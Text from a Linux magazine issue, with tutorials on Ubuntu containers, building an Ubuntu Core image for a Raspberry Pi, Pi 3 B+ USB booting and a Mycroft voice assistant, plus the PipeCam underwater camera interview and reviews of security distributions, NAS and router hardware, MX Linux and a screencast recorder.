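As a rough illustration of the two routes, the commands below sketch a p2c import and the VirtualBox-to-OpenStack path; all names are placeholders, the lxd-p2c argument order follows its built-in help, and the exact OpenStack flags can vary between releases.

# Physical (or VM) to LXD container: point lxd-p2c at a remote LXD server
./lxd-p2c https://lxd.example.com:8443 migrated-host /

# VirtualBox to OpenStack: convert the disk, smoke-test it, then register and boot it
VBoxManage clonehd ubuntu-vm.vdi ubuntu-vm.img --format RAW
kvm -m 2048 -drive file=ubuntu-vm.img,format=raw
openstack image create --disk-format raw --container-format bare --file ubuntu-vm.img ubuntu-migrated
openstack server create --image ubuntu-migrated --flavor m1.small --key-name mykey migrated-instance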
Deploying containers can be time- and storage-consuming, but one change in Ubuntu 18.04 helps ease the pain. The Bionic Beaver minimal install images have been reduced by over 53 per cent in size compared to 14.04, aided by the removal of over 100 packages and thousands of files. Of course, minimal images are just that – only what you need to get a basic install running and download additional packages – but at only 31MB compressed and 81MB uncompressed, the images sure are small.
In short, snap packages are easing the process of installing much of the container toolset, a bang up-to-date LTS distro improves the experience after deploying a container, and Ubuntu's own ecosystem additions help with the use of major platforms.
Ubuntu Core is a tiny, transactional version of Ubuntu designed for IoT devices, robotics and large container deployments. It's based on the super-secure, remotely upgradeable Linux app packages known as snaps – and it's used by a raft of leading IoT players, from chipset vendors to device makers and system integrators.
Core uses the same kernel, libraries and system software as classic Ubuntu. Snaps for use with Core can be developed on an Ubuntu PC just like any other application. The difference with Core is that it's been built with the Internet of Things in mind. That means it's secure by default – automatic updates ensure that any critical security issues are addressed even if the device is out in the field. Of course, Ubuntu Core is free; it can be distributed at no cost with a custom kernel, BSP and your own suite of apps. It has unrivalled reliability, with transactional over-the-air updates including full rollback features to cut the costs of managing devices in the field.
Everything in Ubuntu Core is based around digitally signed snaps. The kernel and device drivers are packaged as a snap. The minimal OS itself is also a snap. Finally, all apps themselves are also snaps, ensuring all dependencies are tightly managed. The whole distribution comes in at just 350MB, which is smaller than many rival platforms despite its rich feature set.
Most importantly, Ubuntu Core supports a huge range of devices, from the 32-bit ARM Raspberry Pi 1 and 2 and the 64-bit Qualcomm ARM DragonBoard 410c to Intel's latest range of IoT SoCs.
The process of building a custom Ubuntu Core image is straightforward. For new boards, it's necessary to create a kernel snap, gadget snap and a model assertion. Otherwise, the process involves registering a key with the Ubuntu Store, creating and signing a model assertion, and building the image – as the steps below show.

[Diagram: classic Ubuntu 18.04 versus Ubuntu Core 18 – on Core, applications are confined and packaged as snaps with their dependencies]

Below: The current release of ROS, ideal for use on Ubuntu Core, is the 11th version: 'Lunar Loggerhead'

expert opinion
Joshua Elsdon, maker behind the Micro Robots project
"The primary benefit of ROS for me is that it allows for easy communication between different software modules, even over a network. Further, it allows the community of robotics designers a core framework on which they can open source their contributions."

how to
Build a new Ubuntu Core image for a Raspberry Pi 3

1 Create a key to sign uploads
Before starting to build the image, you need to create a key to sign future store uploads. Generate a key that will be linked to your Ubuntu Store account with snapcraft create-key. Confirm the key with snapcraft list-keys.

2 Register with the Ubuntu Store
Next, you have to register your key with the Ubuntu Store, linking it to your account. You will be asked to log in with your store account credentials – use the command snapcraft register-key to start the process.

3 Create a model assertion
To build an image, you need to create a model assertion. This is a JSON file which contains a description of your device, with fields such as model, architecture, kernel and so on. Base this on an existing device and tweak as needed.
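For reference, a Pi 3 model assertion might look something like the sketch below; the account ID is a placeholder you must replace with your own, and the gadget and kernel snap names follow Canonical's image-building examples of the time, so check them against the current documentation.

# Write a hypothetical pi3-model.json (replace <account-id> with your Ubuntu Store account ID)
cat > pi3-model.json <<'EOF'
{
  "type": "model",
  "authority-id": "<account-id>",
  "brand-id": "<account-id>",
  "series": "16",
  "model": "pi3",
  "architecture": "armhf",
  "gadget": "pi3",
  "kernel": "pi2-kernel",
  "timestamp": "2018-04-01T00:00:00+00:00"
}
EOF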
4 Sign the model assertion
Now you need to sign the model assertion with a key. This outputs a model file, the actual assertion document you will use to build your image. Use the command cat pi3-model.json | snap sign -k default &> pi3.model.

5 Build your image
Create your image with the ubuntu-image tool. The tool is installed as a snap via snap install --beta --classic ubuntu-image. Then use: sudo ubuntu-image -c beta -O pi3-test pi3.model.

6 Flash and test your creation
You're now ready to flash and test your image! Use a tool such as dd or GNOME MultiWriter to write the image to an SD card or USB stick and boot it in your device. You'll be prompted for a store account, which downloads the SSH key.
Pi Project: PipeCam
Using a Pi to keep an eye on the bottom of the ocean is simpler than you might think – apart from the leaks

Fred Fourie
Fred is an electronics technician for an engineering firm in Cape Town, South Africa, that specialises in marine sciences.

Like it?
Fred has done construction projects in the Antarctic and has worked on space weather on remote islands. He gets excited about biological sciences and large datasets. Follow his adventures on Twitter at @FredFourie.

Further reading
Fred is interested in areas where the natural world and electronics meet. He's also been tinkering with machine learning and object detection, and suggests there might be some crossover with the project in the future. Follow his projects at https://hackaday.io/FredWFourie.

Sometime in 2014, Fred Fourie saw a long-term time-lapse video of corals fighting with each other for space. That piqued his interest in the study of bio-fouling, which is the accumulation of plants, algae and micro-organisms such as barnacles. Underwater documentaries such as Chasing Coral and Blue Planet II further drove his curiosity and, inspired by the OpenROV project, Fred decided to build an affordable camera rig using inexpensive and easily sourceable components. This he later dubbed PipeCam; head to the project's page (https://hackaday.io/project/21222-pipecam-low-cost-underwater-camera) to read detailed build logs and view the results of underwater tests.

Are power and storage two of the most crucial elements for remote builds such as the PipeCam?
It has been a bit of an ongoing challenge. Initially, I wanted to solve my power issues by making the PipeCam a tethered system, but difficulties in getting a cable into the watertight hull made me turn to a self-contained, battery-powered unit. In the first iterations I had a small rechargeable lead-acid battery and a Raspberry Pi 3, but the current version sports a Pi Zero with a Li-ion power bank. This gives me more than five times the power capacity for a reasonable price. With regards to storage space, I've opted for a small bare-bones USB hub to extend the space with flash drives. There are a few nice Raspberry Pi Zero HATs for this.

What was the most challenging part of the project?
Definitely the underwater housing: I had many leaks. The electronics are all off-the-shelf and the online communities have made finding references for the software that I wrote a breeze, but without a good underwater housing the project is… well, literally dead in the water. At the start of the year I got a friend onboard, Dylan Thomson, to help me with the mechanical parts of the project. Dylan has a workshop with equipment to pressure-test housings (and my calculations). This freed me up to work on the software and electronics.

Talking of software, what is the PipeCam running?
I use Raspbian Lite as my base OS. I load up apache2 by default on most projects so I can host 'quick look' diagnostic pages as I tinker. On the PipeCam I installed i2c-tools to set up my hardware clock to keep track of time on longer deployments. I set up my USB drives to be auto-mounted to a specific location: for this I use blkid to get the drive information, and then add the drives to the system by editing /etc/fstab with the drive details and desired location. The main script is written in Python, as it's my home language. The script checks which drive has enough space to record and, depending on the selected mode (video or photo), it then starts the recording or photo-taking process. The script outputs some basic info which I log from the cron call, which is where I set up my recording interval. It's not complicated stuff.

Any particular reason for using the Raspberry Pi?
I know my way around a Linux system far better than I know microcontrollers. The familiarity of the Pi environment made quick setup and experimentation possible. Also, the community support is excellent.

How do you plan to extend the project?
So far the results have been pretty promising. Ultimately the next iteration will aim to increase user-friendliness and endurance. To achieve this there are three sets of modifications I aim to add:
• Make use of the Pi's GPIO to add settings buttons
• Host a user interface webpage on the Pi itself, for system health checks
• Integrate some battery monitoring with use of current- and voltage-sensing circuits, with a light-dependent resistor (LDR) to determine if there's enough light to take a picture.

Could you explain the Fritzing schematic you've shared on the project page?
The next iteration is all about reducing the power used in idle times. In the circuit you can see that the main power to the Raspberry Pi is controlled via a relay from an Arduino Nano. The Nano takes inputs from a current sensor, voltage sensor and LDR, and decides from these inputs whether the Pi should be switched on. In addition to the RTC on the Pi, you'll also see a BME280 breakout board to monitor pressure, temperature and humidity, to detect changes associated with leaks. There's also a slide switch to select video or photo mode.
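As a rough illustration of the capture workflow Fred describes – his real script is Python, and every path, UUID and interval below is a made-up placeholder – the moving parts look something like this from the shell:

# /etc/fstab entry auto-mounting a flash drive by UUID (find the UUID with blkid), e.g.:
#   UUID=1234-ABCD  /mnt/usb1  vfat  defaults,nofail  0  0
# Pick whichever mounted drive currently has the most free space...
DEST=$(df --output=target,avail /mnt/usb* 2>/dev/null | tail -n +2 | sort -k2 -rn | head -n1 | awk '{print $1}')
# ...then grab a still (or use raspivid for video mode)
raspistill -o "$DEST/$(date +%Y%m%d-%H%M%S).jpg"
# The two lines above would live in a small script (say /home/pi/capture.sh) called from cron, e.g.:
#   */10 * * * * /home/pi/capture.sh >> /home/pi/pipecam.log 2>&1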
Floating brain
Fred first used a Pi 3 and then a Pi 2 before switching to the Pi Zero to reduce power consumption. A cron job on the Pi calls a Python script to check available space on the attached USB drives and, if all's okay, it then snaps a picture or records a video.

Waterproof chassis
The PVC pipe and the end caps protect the electronics from the elements. The leak-proof housing has a 10mm Perspex lens that withstands four bars of pressure.

Fuel
The system currently has no real power management, which Fred admits is a shortcoming that he hopes to remedy soon using an Arduino Nano. For the time being, the current configuration allows for a second power bank.

Data loggers
SanDisk Cruzer Blade USB drives plug into the four-port USB pHAT. statvfs finds the drive with the most free space every time the cron job calls on the script.

I spy
The Raspberry Pi camera module has been giving good results and surprised Fred with its underwater performance. However, the module, with its fiddly ribbon, isn't very robust and he fried one during his tests.

Components list
• Raspberry Pi Zero
• Raspberry Pi Camera Module v2
• USB Hub pHAT
• SanDisk Cruzer Blade USB flash drives
• Power bank
• On/off toggle switch
• 10mm Plexiglass/Perspex lens
• 110mm PVC waste pipe
• 110mm PVC screw-on end cap
• 110mm PVC stop-end
Tutorial Pi 3 B+: USB Booting
Resources
microSD card
USB storage device

…USB 2.0, and there's also improved thermal management. Additional improvements have also been made to booting from a USB mass-storage device, such as a flash drive or hard drive.
This tutorial explains how to take such a device and boot up your Raspberry Pi 3 B+ using it. Once everything's configured, there's no longer any need to use an SD card – it can be removed and used in another Raspberry Pi. The benefits of this are that you can increase the overall storage size of the Pi from a standard 4GB-8GB to upwards of 500GB. A further benefit is that the robustness and reliability of a USB storage device is far greater than an SD card, so this increases the longevity of your data.
Before you begin, please note that this setup is still experimental and is developing all the time. Bear in mind too that it doesn't work with all USB mass-storage devices; you can learn more about why, and view compatible devices, at www.raspberrypi.org/blog/pi-3-booting-part-i-usb-mass-storage-boot.

01 How it works
This setup involves booting the Raspberry Pi from the SD card and then altering the config.txt file in order to set the option to enable USB boot mode. This in turn changes a setting in the One Time Programmable (OTP) memory in the Raspberry Pi's system-on-a-chip, and enables booting from a USB device. Once set, you can remove the SD card for good. Please note that any changes you make to the OTP are permanent, so ensure that you use a suitable Raspberry Pi – for example, one that you know will always be able to be hooked up to the USB drive rather than one you might take on the road.

03 Write the OS to the SD card
Now, write the .img image to the SD card. An easy method to do this is with Etcher, which can be downloaded from https://etcher.io. Insert your SD card into your computer and wait for it to load. Open Etcher and click the first 'image' button, select the location of the .img file, then click the 'select drive' button and select the drive letter which corresponds to the SD card. Finally, click the 'Flash!' button to write the image to the card.

04 Write the OS to the USB device
We now need to write the same Raspbian OS image to your USB storage device. You can use the same .img image that you downloaded in step two. Ensure that you have ejected the SD card and load Etcher. Attach the USB storage and, once loaded, select the relevant drive from the Etcher menu. Drag the .img image file across as you did in step three. While that's writing, place the SD card into your Raspberry Pi and boot it up ready for the next step.
05 What's new
With the release of the new Raspberry Pi 3 B+, the operating system was also updated. This features an upgraded version of Thonny, the Python editor, as well as PepperFlash player and Pygame Zero version 1.2. There's also extended support for larger screens. To use that, from the main menu select the Raspberry Pi Configuration option. Navigate to the System tab and locate the 'Pixel Doubling' option. This option draws every pixel on the desktop as a 2x2 block of pixels, which makes everything twice the size. This setting works well with larger screens and HiDPI displays.

…Type vcgencmd otp_dump | grep 17, then press Enter. If the OTP has been programmed successfully, 17:3020000a will be displayed in the Terminal. If it's any different, return to step 7 and re-enter the line of code.

09 Boot from the USB storage device
This completes the configuration of the OTP. …
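For reference, the whole enable-and-verify sequence can be run from a terminal on the Pi as below; the program_usb_boot_mode line is the config.txt option documented by the Raspberry Pi Foundation for this procedure, so double-check it against the blog post linked earlier.

# Enable USB boot mode in the OTP, then reboot
echo program_usb_boot_mode=1 | sudo tee -a /boot/config.txt
sudo reboot
# After rebooting, confirm the OTP bit is set – this should print 17:3020000a
vcgencmd otp_dump | grep 17:
# Once verified, the line can safely be removed from /boot/config.txt again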
Tutorial Mycroft: DIY voice assistant
Resources
Mycroft: https://mycroft.ai/get-mycroft
Raspberry Pi 3
microSD card, 8GB or larger
USB microphone
Speakers
Etcher: https://etcher.io
Above Mycroft Mark II, expected in December this year, looks like being an impressive piece of hardware
…flash the downloaded Picroft image to an SD card. Plug your microSD card into your computer, launch Etcher and select the Picroft image. Then flash it!

02 Set it up
Plug your microSD card back into your Raspberry Pi and connect it to a power source. The easiest way to get everything working is to connect your Pi to the local network via the Ethernet port. If you do need to use Wi-Fi, look out for an SSID called MYCROFT; the default password is 12345678.
Once everything is connected, you'll want to either plug in a monitor and keyboard, or connect via SSH to do this headlessly. Whether via Ethernet or Wi-Fi, once your device is connected you'll need to visit http://home.mycroft.ai to start the setup process. You'll need to sign in with Google, Facebook or GitHub, or create a new Mycroft account; given that part of the reason for this project is to protect your data from being shared with big corporations, the latter might be advisable!

Now that we've paired with Mycroft.ai, we can go to the Settings menu, where you can select a male or female voice, the style of measurement units you want to use, and your preferred time/date formats.
If you're concerned about privacy, you may want to keep the Open Dataset box unticked. Keep in mind, though, that selecting this option is a good way of contributing useful data to the open source project and thus improving the performance of Mycroft in the future, assuming your voice assistant isn't in a particularly confidential environment.

…avoid confusing the Picroft. This is almost certainly why "Hey Google" or "Okay Google" are used on Google Home, rather than just "Google"; it's to avoid said devices picking up on random conversations, something which happened quite a lot in our testing.
You can also switch the text-to-speech engine from Mycroft's Mimic engine to Google's own. This will change the voice you hear to that of Google Home, which is arguably much smoother.

04 Connect to Picroft
SSH into your Picroft and you'll be taken straight into the Mycroft CLI screen. Usually this is quite useful, but while we get things set up we want to exit that screen using Ctrl+C to reach a normal command prompt. Here you'll want to do some basic setting-up. First, change the password: type passwd and follow the prompts. Then change the Wi-Fi network settings:

sudo nano /etc/wpa_supplicant/wpa_supplicant.conf
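The network block you add will look broadly like the following – the SSID and passphrase are placeholders – and you can append it without opening an editor if you prefer:

# Append your Wi-Fi details to wpa_supplicant.conf (values are placeholders)
sudo tee -a /etc/wpa_supplicant/wpa_supplicant.conf > /dev/null <<'EOF'
network={
    ssid="YourNetworkName"
    psk="YourWiFiPassphrase"
}
EOF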
Mycroft, send help
Hey Butler, set an alarm for X am.
Hey Butler, record this.
Hey Butler, what is [insert search term].
Hey Butler, tell me a joke.
Hey Butler, go to sleep.
Hey Butler, read the news.
Hey Butler, set a reminder.
Hey Butler, do I have any reminders?
Hey Butler, increase/decrease volume.
Hey Butler, what's the weather like?
There's an active community on GitHub ready to help with help requests, which will come in handy as Picroft spits out quite a few Python 2.7 errors when Skills refuse to load properly…

You can also skip our earlier step of using nmap or arp by asking "Hey Butler, what is my IP address?".

08 Adding Skills
Of course, the default abilities are all well and good, but surely where an open source program comes into its own is with customisation. Mycroft/Picroft is no different in this regard, with a whole range of different voice abilities available. These seem to have been coined 'Skills' – we can thank Amazon for that.
Back at Mycroft.ai, it's time to explore the Skills menu. There's an option to paste a GitHub URL to install a Skill, which is quite useful, but Mycroft does also recognise "install [name of Skill]" as a command. You'll see a link to a list of community-developed Skills, where you can also find the names and command needed to install them. "install YouTube" adds a simple YouTube streaming Skill, for example.

…threw up PHP errors, which are visible in the Picroft command-line interface and log viewer. It seems as if Skills are very hit-and-miss at the moment. There is a 'status' column for each one on the community page which is meant to indicate its readiness, but we found the results to be inconsistent.

09 Play music
The only officially supported music-playing app seems to be mopidy, which we had great difficulty in getting working. Hours of fiddling with dependencies and an extended deadline later, we still had no luck. However, we did find spotify-skill in the GitHub repository, which works a treat.
Simply by copying the GitHub URL (https://github.com/forslund/spotify-skill) into the 'Skill URL' box on Mycroft.ai and ticking 'Automatic Install', moments later we had a new menu option to input our Spotify details. Then "Hey Mycroft, Play Spotify" loads up our most recent playlist. The only problem was that we couldn't figure out a way to stream directly to the Mycroft; spotify-skill only streams music to another Spotify Connect device. It's only speculation on our part, but we assume this is something to do with licensing restrictions for 'official' Spotify devices.
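If you'd rather stay at the command line, the same Skill can usually be pulled in with the Mycroft Skills Manager listed later in this tutorial; treat the exact git-URL form as an assumption and check msm's own help output on your Picroft.

# Install the community Spotify Skill with the Mycroft Skills Manager (URL form is an assumption)
msm install https://github.com/forslund/spotify-skill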
11 Replacing commercial voice assistants
While the Picroft has been a fun experiment to sink (way too many) hours into, do we think it's ready for prime time? In a word: no. While the core experience may be fine, it's extremely limited and the Skills are not yet up to scratch. In our experience, they're just not very likely to work, even after hours of fiddling.
If you're looking for a new hobby and don't mind putting a few days into this, you'll get some enjoyment out of it. However, if you're looking for a new voice assistant to read you the news, wake you up and play your favourite music or radio station, we're still forced to recommend one of the commercial units. Having said that, Mycroft Mark II is available to reserve on Indiegogo right now too.

12 Testing
It may be that Mycroft's voice recognition isn't up to scratch, or it may be that the microphone we used for testing was cheap and useless, but constantly issuing commands via voice during the testing process proved to be tiring. Fortunately, Mycroft supports text-based commands, too.
If you SSH into your Picroft you can type text commands directly into the command-line interface. If you exit out of the CLI, there are a number of command prompts available:
mycroft-cli-client – A command-line client, useful for debugging
msm – Mycroft Skills Manager, to install new Skills
say_to_mycroft – Use one-shot commands via the command line
speak – Say something to the user
test_microphone – Record a sample and then play it back, to test your microphone

13 Becoming a supporter
Mycroft offers an optional subscription service, at $1.99 per month or $19.99 for a year. While the…

Other versions of Mycroft
At the moment Mycroft is available in several flavours. The version we're looking at here, technically known as Picroft, consists of the free software only – you'll need to add your own Raspberry Pi to run it, plus speakers and a mic.
If you prefer an off-the-shelf version, you can opt for the Mycroft Mark I ($180), a standalone hardware device which is equally 'hackable' in terms of adding abilities or changing code. Finally, there's Mycroft for Linux, which you need to install using either a shell script or a standalone installer. Mycroft AI describes this as "strictly for geeks".

Above: Mycroft Mark I comes with speakers and mic built-in
Group test | Hardware | Distro | Free software

Group test
Security distributions
Use one of these specialised builds that go one step further than your favourite distribution's security policies and mechanisms
Kodachi
• Kodachi enables you to use your own VPN instead of Kodachi's, and will ban users who misuse their VPN for things such as hosting illegal torrents
Overall: 8
Kodachi uses Firejail to sandbox apps and isn't very easy to install. But its collection of privacy-centred tools and utilities that help you remain anonymous when online is unparalleled.

Qubes OS
• Qubes OS has an easy-to-follow installer, but it is a complicated distro and you need to learn the ropes. (See LU&D189 p60 for a detailed guide.)
Overall: 7
Qubes compartmentalises the entire Linux installation into Xen-powered virtual domains. This arrangement ensures that a compromised app doesn't bring down the entire installation.
Subgraph OS
Manages to successfully tread the line between usability and security
• You can use the intuitive Subgraph Firewall to monitor and filter outgoing connections from individual apps
Overall: 8
Subgraph goes to great lengths to ensure that everything from the kernel to the userland utilities isn't exploitable. It also bundles a host of privacy-centred apps along with mainstream desktop apps.

Whonix
A ready-to-use OS that's available as two KDE-powered virtual machines
• The iptables rules on the Whonix-Workstation force it to only connect to the virtual internet LAN and redirect all traffic to the Whonix-Gateway
Overall: 8
Whonix is a desktop distro that's available as two separate VMs. It ensures security and privacy by using a virtualisation app to isolate the work environment from the one that faces the internet.
Hardware
TerraMaster F4-420
Pros
Offers a strong enclosure, easy installation and a powerful platform that's quiet in operation.
Cons
No drive locks supplied, and a combination of limited application selection and generally poor app support.
Summary
Solid enough construction and hardware design (if you like rounded silver surfaces) can't overcome the lack of attention given to the operating system and applications. Poor docs, limited apps and CPU power that is difficult to use are…
Overall: 7
Trendnet TEW-817DTR
Pros
An affordable price for a wireless router that is WISP-capable, while still being highly portable for travellers.
Cons
Needs a carry pouch, and the manufacturer needs to address the captive portals restriction for it to be almost perfect.
Summary
This compact travel router is inexpensive, easy to carry and deploy. It also supports WISP technology for…
Distro
MX Linux 17.1
A joint effort of two popular projects, this elegant distribution is steadily gaining in popularity

Specs
CPU: i686 Intel or AMD processor
Graphics: Video adaptor and monitor with 1,024x768 or higher resolution
RAM: 512MB
Storage: 5GB
License: GPL and various
Available from: https://mxlinux.org

The MX Linux project is a joint effort between the antiX and MEPIS communities, and the distribution they produce uses some modified components from both projects. MX Linux is also popular for its stance of sticking with sysvinit instead of switching over to systemd.
The distribution uses a customised Xfce for a dapper-looking desktop that performs adequately even on older hardware. MX Linux ships as a Live environment and uses a custom installer verbose enough to explain what's going on with the various steps. The installer also uses reasonable defaults that'll help first-timers sail through the installation. The partitioning screen offers the option to partition the disk automatically if you want MX Linux to take over the entire disk; dual-booters and advanced users will have to use GParted to manually partition the disk. Advanced users will appreciate the option to control the services that start during boot, while new users can press ahead with the defaults. If you've made any modifications to the desktop in the Live environment, you can ask the installer to carry these over to the installation, which is a nice touch.
The desktop boots to a welcome screen that contains useful links to common tweaks and the distribution's set of custom tools. The installation also includes a detailed 172-page user's manual, and you can access other avenues of help and support, including forums and videos, on the project's website.

Above: MX Linux very responsibly notifies users when a program is started with root permission without it prompting the user

The clean, iconless desktop displays basic system information via an attractive Conky display. Also by default, the Xfce panel is pinned to the left side of the screen and uses the Whisker menu.
MX Linux's default collection of apps doesn't disappoint, as it includes everything to fulfil the requirements of a typical desktop user. In addition to a host of Xfce apps and utilities, there's Firefox, Thunderbird, LibreOffice, GIMP, VLC, luckyBackup and more. MX is built on the current Debian Stable release but updates a lot of apps and back-ports newer versions from Debian Testing. The only downside of this arrangement is that you'll have to do a fresh install of MX Linux when the distribution switches to a new Debian Stable release.
An icon in the status bar announces available updates; you can click it to open the update utility, which works in two modes. The default is the full upgrade mode, which is the equivalent of dist-upgrade and will update packages and resolve dependencies even if it requires adding or removing new packages. There's also a basic upgrade mode that will only install available updates. In the latest 17.1 release, the update utility has new options to enable unattended installations using either of these mechanisms.
The update utility is part of the distribution's set of custom tools designed to help users manage their installation. These are housed under the MX Tools dashboard and cover a wide range of functionality, including a boot-repair tool, a codecs downloader, a utility to manipulate Conky, a Live USB creator, and a snapshot tool for making bootable ISO images of the working installation.
One of the tools you'll be using quite often is the MX Package Installer, which has undergone a major rewrite in the 17.1 release. The installer includes popular applications from the Debian Stable repositories along with packages from Debian Testing. It also lists curated packages that aren't in either repository but which have been pulled from the official developers' websites or other repositories, and have been configured to work seamlessly with MX Linux.

Pros
The custom package manager with its list of curated packages, and the custom MX Tools.
Cons
The hassle of backing up data and doing a fresh install whenever MX switches to a new Debian Stable.
Summary
MX Linux is a wonderfully built distribution that scores well for looks and performance. The highlight is its custom tools that make regular admin tasks a breeze. The package manager, and the remastering and snapshot tools, also deserve a mention.
Overall: 9
Mayank Sharma
Review Fresh free & open source software
Screencast recorder
SimpleScreenRecorder 0.3.10
Record and share desktop screencasts with ease
This app’s name is actually something
of a misnomer. It’s flush with features
and tweakable parameters, and gives
its users a good amount of control over
the screencast. SSR can record the entire screen
and also enables you to select and record particular
windows and regions on the desktop.
It uses a wizard-like interface and each step of the
process has several options. All these have helpful
tooltips that do a wonderful job of explaining their
purpose. In addition to selecting the dimensions of
the screen recording, you can also scale the video
and alter its frame rate.
The next screen offers several options for
selecting the container and audio and video codecs
for the recording, as well as a few associated
settings. SSR supports all the container formats that
are supported by the FFmpeg and libav libraries, including MKV, MP4, WebM and OGG, as well as a host of others such as 3GP, AVI and MOV. You can also choose codecs for the audio and video stream separately, and preview the recording area before you start capturing it.
While it's recording, the application enables you to keep an eye on various recording parameters, such as the size of the captured video.

Above: If you want, you can pass additional options via CLI parameters and save them as custom profiles for later use

Pros
A well-documented interface that's easy to use but still manages to pack in a lot of parameters.
Cons
Lacks some options offered by its peers, such as the ability to record a webcam with the desktop.
Great for…
Making quick screencasts in all popular formats.
http://www.maartenbaert.be/simplescreenrecorder
Free Resources
Welcome to FileSilo!
Download the best distros, essential FOSS and all
our tutorial project files from your FileSilo account
What is it?
Every time you see this symbol in the magazine, there is free online content that's waiting to be unlocked on FileSilo.

Why register?
• Secure and safe online access, from anywhere
• Free access for every reader, print and digital
• Download only the files you want, when you want

1. Unlock your content
Go to www.filesilo.co.uk/linuxuser and follow the instructions on screen to create an account with our secure FileSilo system. When your issue arrives or you download your digital edition, log into your account and unlock individual issues by answering a simple question based on the pages of the magazine for instant access to the extras. Simple!

2. Enjoy the resources
You can access FileSilo on any computer, tablet or smartphone device using any popular browser. However, we recommend that you use a computer to download content, as you may not be able to download files to other devices. If you have any problems with accessing content on FileSilo, take a look at the FAQs online or email our team at [email protected].
Log in to www.filesilo.co.uk/linuxuser
tutorial code
Get into the container business with our
example scripts, Dockerfiles, Ansible
playbook samples and Puppet manifests.
NEXT ISSUE ON SALE 3 May
Master the Cloud | Unsolvable computing problems | Nextcloud for biz
Follow us – Facebook: facebook.com/LinuxUserUK  Twitter: @linuxusermag
Back page short story: near-future fiction from Stephen Oram